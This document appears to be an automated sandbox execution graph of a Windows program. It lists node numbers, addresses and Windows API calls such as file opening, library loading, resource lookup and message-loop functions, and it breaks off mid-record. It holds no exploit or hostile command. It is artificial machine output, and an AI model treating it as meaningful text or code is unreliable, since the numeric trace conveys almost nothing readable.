                                                                                                                                                                                                                                          execution_graph 95859 d1cad SystemParametersInfoW 95860 162a55 95868 141ebc 95860->95868 95863 162a70 95870 1339c0 22 API calls 95863->95870 95864 162a87 95866 162a7c 95871 13417d 22 API calls __fread_nolock 95866->95871 95869 141ec3 IsWindow 95868->95869 95869->95863 95869->95864 95870->95866 95871->95864 95872 ddee5 95875 db710 95872->95875 95876 db72b 95875->95876 95877 120146 95876->95877 95878 1200f8 95876->95878 95890 db750 95876->95890 95930 1558a2 95877->95930 95881 120102 95878->95881 95883 12010f 95878->95883 95878->95890 95970 155d33 257 API calls 95881->95970 95898 dba20 95883->95898 95971 1561d0 257 API calls 2 library calls 95883->95971 95888 ed336 40 API calls 95888->95890 95889 1203d9 95889->95889 95890->95888 95892 dba4e 95890->95892 95894 120322 95890->95894 95890->95898 95902 dbbe0 40 API calls 95890->95902 95906 dec40 95890->95906 95953 da81b 95890->95953 95957 ed2f0 95890->95957 95963 ea01b 257 API calls 95890->95963 95964 f0242 5 API calls __Init_thread_wait 95890->95964 95965 eedcd 22 API calls 95890->95965 95966 f00a3 29 API calls __onexit 95890->95966 95967 f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95890->95967 95968 eee53 82 API calls 95890->95968 95969 ee5ca 257 API calls 95890->95969 95972 daceb 95890->95972 95982 12f6bf 23 API calls 95890->95982 95983 da8c7 22 API calls __fread_nolock 95890->95983 95984 155c0c 82 API calls 95894->95984 95898->95892 95985 14359c 82 API calls __wsopen_s 95898->95985 95902->95890 95928 dec76 messages 95906->95928 95907 f0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95907->95928 95908 efddb 22 API calls 95908->95928 95909 f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95909->95928 95911 dfef7 95923 ded9d messages 95911->95923 95989 da8c7 22 API calls __fread_nolock 95911->95989 95913 124600 95913->95923 95988 da8c7 22 API calls __fread_nolock 95913->95988 95914 124b0b 95991 14359c 82 API calls __wsopen_s 95914->95991 95918 da8c7 22 API calls 95918->95928 95921 dfbe3 95921->95923 95924 124bdc 95921->95924 95929 df3ae messages 95921->95929 95922 da961 22 API calls 95922->95928 95923->95890 95992 14359c 82 API calls __wsopen_s 95924->95992 95925 f00a3 29 API calls pre_c_initialization 95925->95928 95927 124beb 95993 14359c 82 API calls __wsopen_s 95927->95993 95928->95907 95928->95908 95928->95909 95928->95911 95928->95913 95928->95914 95928->95918 95928->95921 95928->95922 95928->95923 95928->95925 95928->95927 95928->95929 95986 e01e0 257 API calls 2 library calls 95928->95986 95987 e06a0 41 API calls messages 95928->95987 95929->95923 95990 14359c 82 API calls __wsopen_s 95929->95990 95931 1558e1 95930->95931 95932 1558cb 95930->95932 95942 155935 95931->95942 95995 f0242 5 API calls __Init_thread_wait 95931->95995 95932->95931 95933 1558d0 95932->95933 95994 155d33 257 API calls 95933->95994 95936 155906 95936->95942 95996 eedcd 22 API calls 95936->95996 95937 1558dc 95937->95890 95938 ed2f0 40 API calls 95938->95942 95941 15591f 95997 f00a3 29 API calls __onexit 95941->95997 95942->95937 95942->95938 95943 155aa8 95942->95943 95945 da81b 41 API calls 95942->95945 95949 eee53 82 API calls 95942->95949 95951 dec40 257 API calls 95942->95951 95999 ea01b 257 API calls 95942->95999 96000 155c0c 82 API calls 95942->96000 96001 ee5ca 257 API calls 95942->96001 96002 14359c 82 API calls __wsopen_s 95943->96002 95945->95942 95946 155929 95998 f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95946->95998 95949->95942 95951->95942 95954 da826 95953->95954 95955 da855 95954->95955 96003 da993 95954->96003 95955->95890 95958 ed2fc 95957->95958 95961 ed329 95957->95961 95959 ed321 95958->95959 96073 ed336 40 API calls 95958->96073 95959->95890 95961->95958 96074 ed336 40 API calls 95961->96074 95963->95890 95964->95890 95965->95890 95966->95890 95967->95890 95968->95890 95969->95890 95970->95883 95971->95898 95973 dacf9 95972->95973 95981 dad2a messages 95972->95981 95974 dad55 95973->95974 95976 dad01 messages 95973->95976 95974->95981 96075 da8c7 22 API calls __fread_nolock 95974->96075 95977 11fa48 95976->95977 95978 dad21 95976->95978 95976->95981 95977->95981 96076 ece17 22 API calls messages 95977->96076 95979 11fa3a VariantClear 95978->95979 95978->95981 95979->95981 95981->95890 95982->95890 95983->95890 95984->95898 95985->95889 95986->95928 95987->95928 95988->95923 95989->95923 95990->95923 95991->95923 95992->95927 95993->95923 95994->95937 95995->95936 95996->95941 95997->95946 95998->95942 95999->95942 96000->95942 96001->95942 96002->95937 96020 dbbe0 96003->96020 96005 da9a3 96006 11f8c8 96005->96006 96007 da9b1 96005->96007 96008 daceb 23 API calls 96006->96008 96028 efddb 96007->96028 96010 11f8d3 96008->96010 96011 da9c2 96038 da961 96011->96038 96014 da9db 96016 efddb 22 API calls 96014->96016 96017 da9e5 96016->96017 96044 da869 40 API calls 96017->96044 96019 daa09 96019->95955 96021 dbe27 96020->96021 96026 dbbf3 96020->96026 96021->96005 96023 da961 22 API calls 96023->96026 96024 dbc9d 96024->96005 96026->96023 96026->96024 96045 f0242 5 API calls __Init_thread_wait 96026->96045 96046 f00a3 29 API calls __onexit 96026->96046 96047 f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96026->96047 96031 efde0 96028->96031 96030 efdfa 96030->96011 96031->96030 96033 efdfc 96031->96033 96048 fea0c 96031->96048 96055 f4ead 7 API calls 2 library calls 96031->96055 96037 f066d 96033->96037 96056 f32a4 RaiseException 96033->96056 96035 f068a 96035->96011 96057 f32a4 RaiseException 96037->96057 96060 efe0b 96038->96060 96040 da976 96041 efddb 22 API calls 96040->96041 96042 da984 96041->96042 96042->96014 96043 da8c7 22 API calls __fread_nolock 96042->96043 96043->96014 96044->96019 96045->96026 96046->96026 96047->96026 96053 103820 IsInExceptionSpec 96048->96053 96049 10385e 96059 ff2d9 20 API calls _abort 96049->96059 96051 103849 RtlAllocateHeap 96052 10385c 96051->96052 96051->96053 96052->96031 96053->96049 96053->96051 96058 f4ead 7 API calls 2 library calls 96053->96058 96055->96031 96056->96037 96057->96035 96058->96053 96059->96052 96063 efddb 96060->96063 96061 fea0c ___std_exception_copy 21 API calls 96061->96063 96062 efdfa 96062->96040 96063->96061 96063->96062 96066 efdfc 96063->96066 96070 f4ead 7 API calls 2 library calls 96063->96070 96065 f066d 96072 f32a4 RaiseException 96065->96072 96066->96065 96071 f32a4 RaiseException 96066->96071 96068 f068a 96068->96040 96070->96063 96071->96065 96072->96068 96073->95959 96074->95958 96075->95981 96076->95981 96077 d1044 96082 d10f3 96077->96082 96079 d104a 96118 f00a3 29 API calls __onexit 96079->96118 96081 d1054 96119 d1398 96082->96119 96086 d116a 96087 da961 22 API calls 96086->96087 96088 d1174 96087->96088 96089 da961 22 API calls 96088->96089 96090 d117e 96089->96090 96091 da961 22 API calls 96090->96091 96092 d1188 96091->96092 96093 da961 22 API calls 96092->96093 96094 d11c6 96093->96094 96095 da961 22 API calls 96094->96095 96096 d1292 96095->96096 96129 d171c 96096->96129 96100 d12c4 96101 da961 22 API calls 96100->96101 96102 d12ce 96101->96102 96150 e1940 96102->96150 96104 d12f9 96160 d1aab 96104->96160 96106 d1315 96107 d1325 GetStdHandle 96106->96107 96108 112485 96107->96108 96109 d137a 96107->96109 96108->96109 96110 11248e 96108->96110 96113 d1387 OleInitialize 96109->96113 96111 efddb 22 API calls 96110->96111 96112 112495 96111->96112 96167 14011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 96112->96167 96113->96079 96115 11249e 96168 140944 CreateThread 96115->96168 96117 1124aa CloseHandle 96117->96109 96118->96081 96169 d13f1 96119->96169 96122 d13f1 22 API calls 96123 d13d0 96122->96123 96124 da961 22 API calls 96123->96124 96125 d13dc 96124->96125 96176 d6b57 96125->96176 96127 d1129 96128 d1bc3 6 API calls 96127->96128 96128->96086 96130 da961 22 API calls 96129->96130 96131 d172c 96130->96131 96132 da961 22 API calls 96131->96132 96133 d1734 96132->96133 96134 da961 22 API calls 96133->96134 96135 d174f 96134->96135 96136 efddb 22 API calls 96135->96136 96137 d129c 96136->96137 96138 d1b4a 96137->96138 96139 d1b58 96138->96139 96140 da961 22 API calls 96139->96140 96141 d1b63 96140->96141 96142 da961 22 API calls 96141->96142 96143 d1b6e 96142->96143 96144 da961 22 API calls 96143->96144 96145 d1b79 96144->96145 96146 da961 22 API calls 96145->96146 96147 d1b84 96146->96147 96148 efddb 22 API calls 96147->96148 96149 d1b96 RegisterWindowMessageW 96148->96149 96149->96100 96151 e1981 96150->96151 96155 e195d 96150->96155 96199 f0242 5 API calls __Init_thread_wait 96151->96199 96153 e198b 96153->96155 96200 f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96153->96200 96159 e196e 96155->96159 96201 f0242 5 API calls __Init_thread_wait 96155->96201 96156 e8727 96156->96159 96202 f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96156->96202 96159->96104 96161 d1abb 96160->96161 96162 11272d 96160->96162 96163 efddb 22 API calls 96161->96163 96203 143209 23 API calls 96162->96203 96165 d1ac3 96163->96165 96165->96106 96166 112738 96167->96115 96168->96117 96204 14092a 28 API calls 96168->96204 96170 da961 22 API calls 96169->96170 96171 d13fc 96170->96171 96172 da961 22 API calls 96171->96172 96173 d1404 96172->96173 96174 da961 22 API calls 96173->96174 96175 d13c6 96174->96175 96175->96122 96177 114ba1 96176->96177 96178 d6b67 _wcslen 96176->96178 96189 d93b2 96177->96189 96181 d6b7d 96178->96181 96182 d6ba2 96178->96182 96180 114baa 96180->96180 96188 d6f34 22 API calls 96181->96188 96183 efddb 22 API calls 96182->96183 96185 d6bae 96183->96185 96187 efe0b 22 API calls 96185->96187 96186 d6b85 __fread_nolock 96186->96127 96187->96186 96188->96186 96190 d93c0 96189->96190 96192 d93c9 __fread_nolock 96189->96192 96190->96192 96193 daec9 96190->96193 96192->96180 96194 daedc 96193->96194 96198 daed9 __fread_nolock 96193->96198 96195 efddb 22 API calls 96194->96195 96196 daee7 96195->96196 96197 efe0b 22 API calls 96196->96197 96197->96198 96198->96192 96199->96153 96200->96155 96201->96156 96202->96159 96203->96166 96205 d2de3 96206 d2df0 __wsopen_s 96205->96206 96207 d2e09 96206->96207 96208 112c2b ___scrt_fastfail 96206->96208 96221 d3aa2 96207->96221 96211 112c47 GetOpenFileNameW 96208->96211 96213 112c96 96211->96213 96215 d6b57 22 API calls 96213->96215 96217 112cab 96215->96217 96217->96217 96218 d2e27 96249 d44a8 96218->96249 96279 111f50 96221->96279 96224 d3ace 96226 d6b57 22 API calls 96224->96226 96225 d3ae9 96285 da6c3 96225->96285 96228 d3ada 96226->96228 96281 d37a0 96228->96281 96231 d2da5 96232 111f50 __wsopen_s 96231->96232 96233 d2db2 GetLongPathNameW 96232->96233 96234 d6b57 22 API calls 96233->96234 96235 d2dda 96234->96235 96236 d3598 96235->96236 96237 da961 22 API calls 96236->96237 96238 d35aa 96237->96238 96239 d3aa2 23 API calls 96238->96239 96240 d35b5 96239->96240 96241 1132eb 96240->96241 96242 d35c0 96240->96242 96246 11330d 96241->96246 96303 ece60 41 API calls 96241->96303 96291 d515f 96242->96291 96248 d35df 96248->96218 96304 d4ecb 96249->96304 96252 113833 96326 142cf9 96252->96326 96253 d4ecb 94 API calls 96255 d44e1 96253->96255 96255->96252 96257 d44e9 96255->96257 96256 113848 96258 113869 96256->96258 96259 11384c 96256->96259 96261 113854 96257->96261 96262 d44f5 96257->96262 96260 efe0b 22 API calls 96258->96260 96367 d4f39 96259->96367 96271 1138ae 96260->96271 96373 13da5a 82 API calls 96261->96373 96366 d940c 136 API calls 2 library calls 96262->96366 96266 113862 96266->96258 96267 d2e31 96268 113a5f 96273 113a67 96268->96273 96269 d4f39 68 API calls 96269->96273 96271->96268 96271->96273 96276 d9cb3 22 API calls 96271->96276 96352 da4a1 96271->96352 96360 d3ff7 96271->96360 96374 13967e 22 API calls __fread_nolock 96271->96374 96375 1395ad 42 API calls _wcslen 96271->96375 96376 140b5a 22 API calls 96271->96376 96273->96269 96377 13989b 82 API calls __wsopen_s 96273->96377 96276->96271 96280 d3aaf GetFullPathNameW 96279->96280 96280->96224 96280->96225 96282 d37ae 96281->96282 96283 d93b2 22 API calls 96282->96283 96284 d2e12 96283->96284 96284->96231 96286 da6dd 96285->96286 96287 da6d0 96285->96287 96288 efddb 22 API calls 96286->96288 96287->96228 96289 da6e7 96288->96289 96290 efe0b 22 API calls 96289->96290 96290->96287 96292 d516e 96291->96292 96296 d518f __fread_nolock 96291->96296 96295 efe0b 22 API calls 96292->96295 96293 efddb 22 API calls 96294 d35cc 96293->96294 96297 d35f3 96294->96297 96295->96296 96296->96293 96298 d3605 96297->96298 96302 d3624 __fread_nolock 96297->96302 96300 efe0b 22 API calls 96298->96300 96299 efddb 22 API calls 96301 d363b 96299->96301 96300->96302 96301->96248 96302->96299 96303->96241 96378 d4e90 LoadLibraryA 96304->96378 96309 d4ef6 LoadLibraryExW 96386 d4e59 LoadLibraryA 96309->96386 96310 113ccf 96311 d4f39 68 API calls 96310->96311 96314 113cd6 96311->96314 96316 d4e59 3 API calls 96314->96316 96318 113cde 96316->96318 96317 d4f20 96317->96318 96319 d4f2c 96317->96319 96408 d50f5 96318->96408 96320 d4f39 68 API calls 96319->96320 96322 d44cd 96320->96322 96322->96252 96322->96253 96325 113d05 96327 142d15 96326->96327 96328 d511f 64 API calls 96327->96328 96329 142d29 96328->96329 96551 142e66 96329->96551 96332 d50f5 40 API calls 96333 142d56 96332->96333 96334 d50f5 40 API calls 96333->96334 96335 142d66 96334->96335 96336 d50f5 40 API calls 96335->96336 96337 142d81 96336->96337 96338 d50f5 40 API calls 96337->96338 96339 142d9c 96338->96339 96340 d511f 64 API calls 96339->96340 96341 142db3 96340->96341 96342 fea0c ___std_exception_copy 21 API calls 96341->96342 96343 142dba 96342->96343 96344 fea0c ___std_exception_copy 21 API calls 96343->96344 96345 142dc4 96344->96345 96346 d50f5 40 API calls 96345->96346 96347 142dd8 96346->96347 96348 1428fe 27 API calls 96347->96348 96349 142dee 96348->96349 96351 142d3f 96349->96351 96557 1422ce 79 API calls 96349->96557 96351->96256 96353 da52b 96352->96353 96358 da4b1 __fread_nolock 96352->96358 96355 efe0b 22 API calls 96353->96355 96354 efddb 22 API calls 96356 da4b8 96354->96356 96355->96358 96357 efddb 22 API calls 96356->96357 96359 da4d6 96356->96359 96357->96359 96358->96354 96359->96271 96361 d400a 96360->96361 96363 d40ae 96360->96363 96362 efe0b 22 API calls 96361->96362 96365 d403c 96361->96365 96362->96365 96363->96271 96364 efddb 22 API calls 96364->96365 96365->96363 96365->96364 96366->96267 96368 d4f43 96367->96368 96372 d4f4a 96367->96372 96558 fe678 96368->96558 96370 d4f59 96370->96261 96371 d4f6a FreeLibrary 96371->96370 96372->96370 96372->96371 96373->96266 96374->96271 96375->96271 96376->96271 96377->96273 96379 d4ea8 GetProcAddress 96378->96379 96380 d4ec6 96378->96380 96381 d4eb8 96379->96381 96383 fe5eb 96380->96383 96381->96380 96382 d4ebf FreeLibrary 96381->96382 96382->96380 96416 fe52a 96383->96416 96385 d4eea 96385->96309 96385->96310 96387 d4e8d 96386->96387 96388 d4e6e GetProcAddress 96386->96388 96391 d4f80 96387->96391 96389 d4e7e 96388->96389 96389->96387 96390 d4e86 FreeLibrary 96389->96390 96390->96387 96392 efe0b 22 API calls 96391->96392 96393 d4f95 96392->96393 96477 d5722 96393->96477 96395 d4fa1 __fread_nolock 96396 d50a5 96395->96396 96397 113d1d 96395->96397 96407 d4fdc 96395->96407 96480 d42a2 CreateStreamOnHGlobal 96396->96480 96491 14304d 74 API calls 96397->96491 96400 113d22 96402 d511f 64 API calls 96400->96402 96401 d50f5 40 API calls 96401->96407 96403 113d45 96402->96403 96404 d50f5 40 API calls 96403->96404 96405 d506e messages 96404->96405 96405->96317 96407->96400 96407->96401 96407->96405 96486 d511f 96407->96486 96409 113d70 96408->96409 96410 d5107 96408->96410 96513 fe8c4 96410->96513 96413 1428fe 96534 14274e 96413->96534 96415 142919 96415->96325 96419 fe536 ___BuildCatchObject 96416->96419 96417 fe544 96441 ff2d9 20 API calls _abort 96417->96441 96419->96417 96421 fe574 96419->96421 96420 fe549 96442 1027ec 26 API calls _abort 96420->96442 96422 fe579 96421->96422 96423 fe586 96421->96423 96443 ff2d9 20 API calls _abort 96422->96443 96433 108061 96423->96433 96427 fe58f 96428 fe595 96427->96428 96429 fe5a2 96427->96429 96444 ff2d9 20 API calls _abort 96428->96444 96445 fe5d4 LeaveCriticalSection __fread_nolock 96429->96445 96430 fe554 __wsopen_s 96430->96385 96434 10806d ___BuildCatchObject 96433->96434 96446 102f5e EnterCriticalSection 96434->96446 96436 10807b 96447 1080fb 96436->96447 96440 1080ac __wsopen_s 96440->96427 96441->96420 96442->96430 96443->96430 96444->96430 96445->96430 96446->96436 96451 10811e 96447->96451 96448 108088 96461 1080b7 96448->96461 96449 108177 96466 104c7d 20 API calls 2 library calls 96449->96466 96451->96448 96451->96449 96464 f918d EnterCriticalSection 96451->96464 96465 f91a1 LeaveCriticalSection 96451->96465 96452 108180 96467 1029c8 96452->96467 96455 108189 96455->96448 96473 103405 11 API calls 2 library calls 96455->96473 96457 1081a8 96474 f918d EnterCriticalSection 96457->96474 96460 1081bb 96460->96448 96476 102fa6 LeaveCriticalSection 96461->96476 96463 1080be 96463->96440 96464->96451 96465->96451 96466->96452 96468 1029fc __dosmaperr 96467->96468 96469 1029d3 RtlFreeHeap 96467->96469 96468->96455 96469->96468 96470 1029e8 96469->96470 96475 ff2d9 20 API calls _abort 96470->96475 96472 1029ee GetLastError 96472->96468 96473->96457 96474->96460 96475->96472 96476->96463 96478 efddb 22 API calls 96477->96478 96479 d5734 96478->96479 96479->96395 96481 d42bc FindResourceExW 96480->96481 96485 d42d9 96480->96485 96482 1135ba LoadResource 96481->96482 96481->96485 96483 1135cf SizeofResource 96482->96483 96482->96485 96484 1135e3 LockResource 96483->96484 96483->96485 96484->96485 96485->96407 96487 113d90 96486->96487 96488 d512e 96486->96488 96492 fece3 96488->96492 96491->96400 96495 feaaa 96492->96495 96494 d513c 96494->96407 96498 feab6 ___BuildCatchObject 96495->96498 96496 feac2 96508 ff2d9 20 API calls _abort 96496->96508 96498->96496 96499 feae8 96498->96499 96510 f918d EnterCriticalSection 96499->96510 96501 feac7 96509 1027ec 26 API calls _abort 96501->96509 96502 feaf4 96511 fec0a 62 API calls 2 library calls 96502->96511 96505 feb08 96512 feb27 LeaveCriticalSection __fread_nolock 96505->96512 96507 fead2 __wsopen_s 96507->96494 96508->96501 96509->96507 96510->96502 96511->96505 96512->96507 96516 fe8e1 96513->96516 96515 d5118 96515->96413 96517 fe8ed ___BuildCatchObject 96516->96517 96518 fe92d 96517->96518 96519 fe900 ___scrt_fastfail 96517->96519 96520 fe925 __wsopen_s 96517->96520 96531 f918d EnterCriticalSection 96518->96531 96529 ff2d9 20 API calls _abort 96519->96529 96520->96515 96522 fe937 96532 fe6f8 38 API calls 4 library calls 96522->96532 96524 fe91a 96530 1027ec 26 API calls _abort 96524->96530 96527 fe94e 96533 fe96c LeaveCriticalSection __fread_nolock 96527->96533 96529->96524 96530->96520 96531->96522 96532->96527 96533->96520 96537 fe4e8 96534->96537 96536 14275d 96536->96415 96540 fe469 96537->96540 96539 fe505 96539->96536 96541 fe48c 96540->96541 96542 fe478 96540->96542 96546 fe488 __alldvrm 96541->96546 96550 10333f 11 API calls 2 library calls 96541->96550 96548 ff2d9 20 API calls _abort 96542->96548 96545 fe47d 96549 1027ec 26 API calls _abort 96545->96549 96546->96539 96548->96545 96549->96546 96550->96546 96556 142e7a 96551->96556 96552 142d3b 96552->96332 96552->96351 96553 d50f5 40 API calls 96553->96556 96554 1428fe 27 API calls 96554->96556 96555 d511f 64 API calls 96555->96556 96556->96552 96556->96553 96556->96554 96556->96555 96557->96351 96559 fe684 ___BuildCatchObject 96558->96559 96560 fe695 96559->96560 96562 fe6aa 96559->96562 96571 ff2d9 20 API calls _abort 96560->96571 96570 fe6a5 __wsopen_s 96562->96570 96573 f918d EnterCriticalSection 96562->96573 96564 fe69a 96572 1027ec 26 API calls _abort 96564->96572 96565 fe6c6 96574 fe602 96565->96574 96568 fe6d1 96590 fe6ee LeaveCriticalSection __fread_nolock 96568->96590 96570->96372 96571->96564 96572->96570 96573->96565 96575 fe60f 96574->96575 96576 fe624 96574->96576 96591 ff2d9 20 API calls _abort 96575->96591 96581 fe61f 96576->96581 96593 fdc0b 96576->96593 96578 fe614 96592 1027ec 26 API calls _abort 96578->96592 96581->96568 96586 fe646 96610 10862f 96586->96610 96589 1029c8 _free 20 API calls 96589->96581 96590->96570 96591->96578 96592->96581 96594 fdc1f 96593->96594 96595 fdc23 96593->96595 96599 104d7a 96594->96599 96595->96594 96596 fd955 __fread_nolock 26 API calls 96595->96596 96597 fdc43 96596->96597 96625 1059be 62 API calls 4 library calls 96597->96625 96600 104d90 96599->96600 96601 fe640 96599->96601 96600->96601 96602 1029c8 _free 20 API calls 96600->96602 96603 fd955 96601->96603 96602->96601 96604 fd976 96603->96604 96605 fd961 96603->96605 96604->96586 96626 ff2d9 20 API calls _abort 96605->96626 96607 fd966 96627 1027ec 26 API calls _abort 96607->96627 96609 fd971 96609->96586 96611 108653 96610->96611 96612 10863e 96610->96612 96614 10868e 96611->96614 96618 10867a 96611->96618 96628 ff2c6 20 API calls _abort 96612->96628 96633 ff2c6 20 API calls _abort 96614->96633 96615 108643 96629 ff2d9 20 API calls _abort 96615->96629 96630 108607 96618->96630 96619 108693 96634 ff2d9 20 API calls _abort 96619->96634 96621 fe64c 96621->96581 96621->96589 96623 10869b 96635 1027ec 26 API calls _abort 96623->96635 96625->96594 96626->96607 96627->96609 96628->96615 96629->96621 96636 108585 96630->96636 96632 10862b 96632->96621 96633->96619 96634->96623 96635->96621 96637 108591 ___BuildCatchObject 96636->96637 96647 105147 EnterCriticalSection 96637->96647 96639 10859f 96640 1085d1 96639->96640 96641 1085c6 96639->96641 96663 ff2d9 20 API calls _abort 96640->96663 96648 1086ae 96641->96648 96644 1085cc 96664 1085fb LeaveCriticalSection __wsopen_s 96644->96664 96646 1085ee __wsopen_s 96646->96632 96647->96639 96665 1053c4 96648->96665 96650 1086c4 96678 105333 21 API calls 2 library calls 96650->96678 96652 1086be 96652->96650 96653 1086f6 96652->96653 96655 1053c4 __wsopen_s 26 API calls 96652->96655 96653->96650 96656 1053c4 __wsopen_s 26 API calls 96653->96656 96654 10871c 96657 10873e 96654->96657 96679 ff2a3 20 API calls __dosmaperr 96654->96679 96658 1086ed 96655->96658 96659 108702 FindCloseChangeNotification 96656->96659 96657->96644 96662 1053c4 __wsopen_s 26 API calls 96658->96662 96659->96650 96660 10870e GetLastError 96659->96660 96660->96650 96662->96653 96663->96644 96664->96646 96666 1053d1 96665->96666 96667 1053e6 96665->96667 96680 ff2c6 20 API calls _abort 96666->96680 96671 10540b 96667->96671 96682 ff2c6 20 API calls _abort 96667->96682 96670 1053d6 96681 ff2d9 20 API calls _abort 96670->96681 96671->96652 96672 105416 96683 ff2d9 20 API calls _abort 96672->96683 96674 1053de 96674->96652 96676 10541e 96684 1027ec 26 API calls _abort 96676->96684 96678->96654 96679->96657 96680->96670 96681->96674 96682->96672 96683->96676 96684->96674 96685 ddddc 96686 db710 257 API calls 96685->96686 96687 dddea 96686->96687 96688 108402 96693 1081be 96688->96693 96691 10842a 96698 1081ef try_get_first_available_module 96693->96698 96695 1083ee 96712 1027ec 26 API calls _abort 96695->96712 96697 108343 96697->96691 96705 110984 96697->96705 96701 108338 96698->96701 96708 f8e0b 40 API calls 2 library calls 96698->96708 96700 10838c 96700->96701 96709 f8e0b 40 API calls 2 library calls 96700->96709 96701->96697 96711 ff2d9 20 API calls _abort 96701->96711 96703 1083ab 96703->96701 96710 f8e0b 40 API calls 2 library calls 96703->96710 96713 110081 96705->96713 96707 11099f 96707->96691 96708->96700 96709->96703 96710->96701 96711->96695 96712->96697 96716 11008d ___BuildCatchObject 96713->96716 96714 11009b 96771 ff2d9 20 API calls _abort 96714->96771 96716->96714 96718 1100d4 96716->96718 96717 1100a0 96772 1027ec 26 API calls _abort 96717->96772 96724 11065b 96718->96724 96723 1100aa __wsopen_s 96723->96707 96774 11042f 96724->96774 96727 1106a6 96792 105221 96727->96792 96728 11068d 96806 ff2c6 20 API calls _abort 96728->96806 96731 110692 96807 ff2d9 20 API calls _abort 96731->96807 96732 1106ab 96733 1106b4 96732->96733 96734 1106cb 96732->96734 96808 ff2c6 20 API calls _abort 96733->96808 96805 11039a CreateFileW 96734->96805 96738 1106b9 96809 ff2d9 20 API calls _abort 96738->96809 96739 110781 GetFileType 96742 1107d3 96739->96742 96743 11078c GetLastError 96739->96743 96741 110756 GetLastError 96811 ff2a3 20 API calls __dosmaperr 96741->96811 96814 10516a 21 API calls 2 library calls 96742->96814 96812 ff2a3 20 API calls __dosmaperr 96743->96812 96744 110704 96744->96739 96744->96741 96810 11039a CreateFileW 96744->96810 96748 11079a CloseHandle 96748->96731 96751 1107c3 96748->96751 96750 110749 96750->96739 96750->96741 96813 ff2d9 20 API calls _abort 96751->96813 96752 1107f4 96755 110840 96752->96755 96815 1105ab 72 API calls 3 library calls 96752->96815 96754 1107c8 96754->96731 96759 11086d 96755->96759 96816 11014d 72 API calls 4 library calls 96755->96816 96758 110866 96758->96759 96760 11087e 96758->96760 96761 1086ae __wsopen_s 29 API calls 96759->96761 96762 1100f8 96760->96762 96763 1108fc CloseHandle 96760->96763 96761->96762 96773 110121 LeaveCriticalSection __wsopen_s 96762->96773 96817 11039a CreateFileW 96763->96817 96765 110927 96766 110931 GetLastError 96765->96766 96767 11095d 96765->96767 96818 ff2a3 20 API calls __dosmaperr 96766->96818 96767->96762 96769 11093d 96819 105333 21 API calls 2 library calls 96769->96819 96771->96717 96772->96723 96773->96723 96775 110450 96774->96775 96776 11046a 96774->96776 96775->96776 96827 ff2d9 20 API calls _abort 96775->96827 96820 1103bf 96776->96820 96779 1104a2 96782 1104d1 96779->96782 96829 ff2d9 20 API calls _abort 96779->96829 96780 11045f 96828 1027ec 26 API calls _abort 96780->96828 96789 110524 96782->96789 96831 fd70d 26 API calls 2 library calls 96782->96831 96785 11051f 96787 11059e 96785->96787 96785->96789 96786 1104c6 96830 1027ec 26 API calls _abort 96786->96830 96832 1027fc 11 API calls _abort 96787->96832 96789->96727 96789->96728 96791 1105aa 96793 10522d ___BuildCatchObject 96792->96793 96835 102f5e EnterCriticalSection 96793->96835 96795 105234 96797 105259 96795->96797 96801 1052c7 EnterCriticalSection 96795->96801 96804 10527b 96795->96804 96839 105000 21 API calls 3 library calls 96797->96839 96799 1052a4 __wsopen_s 96799->96732 96800 10525e 96800->96804 96840 105147 EnterCriticalSection 96800->96840 96803 1052d4 LeaveCriticalSection 96801->96803 96801->96804 96803->96795 96836 10532a 96804->96836 96805->96744 96806->96731 96807->96762 96808->96738 96809->96731 96810->96750 96811->96731 96812->96748 96813->96754 96814->96752 96815->96755 96816->96758 96817->96765 96818->96769 96819->96767 96821 1103d7 96820->96821 96822 1103f2 96821->96822 96833 ff2d9 20 API calls _abort 96821->96833 96822->96779 96824 110416 96834 1027ec 26 API calls _abort 96824->96834 96826 110421 96826->96779 96827->96780 96828->96776 96829->96786 96830->96782 96831->96785 96832->96791 96833->96824 96834->96826 96835->96795 96841 102fa6 LeaveCriticalSection 96836->96841 96838 105331 96838->96799 96839->96800 96840->96804 96841->96838 96842 122a00 96858 dd7b0 messages 96842->96858 96843 ddb11 PeekMessageW 96843->96858 96844 dd807 GetInputState 96844->96843 96844->96858 96845 121cbe TranslateAcceleratorW 96845->96858 96847 ddb8f PeekMessageW 96847->96858 96848 dda04 timeGetTime 96848->96858 96849 ddb73 TranslateMessage DispatchMessageW 96849->96847 96850 ddbaf Sleep 96850->96858 96851 122b74 Sleep 96864 122aea 96851->96864 96854 121dda timeGetTime 96942 ee300 23 API calls 96854->96942 96857 122c0b GetExitCodeProcess 96862 122c21 WaitForSingleObject 96857->96862 96863 122c37 CloseHandle 96857->96863 96858->96843 96858->96844 96858->96845 96858->96847 96858->96848 96858->96849 96858->96850 96858->96851 96858->96854 96859 1629bf GetForegroundWindow 96858->96859 96861 dd9d5 96858->96861 96858->96864 96870 dec40 257 API calls 96858->96870 96874 ddd50 96858->96874 96881 e1310 96858->96881 96934 eedf6 96858->96934 96939 ddfd0 257 API calls 3 library calls 96858->96939 96940 dbf40 257 API calls 2 library calls 96858->96940 96941 ee551 timeGetTime 96858->96941 96943 143a2a 23 API calls 96858->96943 96944 14359c 82 API calls __wsopen_s 96858->96944 96859->96858 96862->96858 96862->96863 96863->96864 96864->96857 96864->96858 96864->96861 96865 122ca9 Sleep 96864->96865 96945 155658 23 API calls 96864->96945 96946 13e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 96864->96946 96947 ee551 timeGetTime 96864->96947 96948 13d4dc 47 API calls 96864->96948 96865->96858 96870->96858 96875 ddd6f 96874->96875 96876 ddd83 96874->96876 96949 dd260 96875->96949 96981 14359c 82 API calls __wsopen_s 96876->96981 96878 ddd7a 96878->96858 96880 122f75 96880->96880 96882 e1376 96881->96882 96883 e17b0 96881->96883 96884 126331 96882->96884 96887 e1940 9 API calls 96882->96887 97020 f0242 5 API calls __Init_thread_wait 96883->97020 97030 15709c 257 API calls 96884->97030 96890 e13a0 96887->96890 96888 e17ba 96891 e17fb 96888->96891 97021 d9cb3 96888->97021 96889 12633d 96889->96858 96893 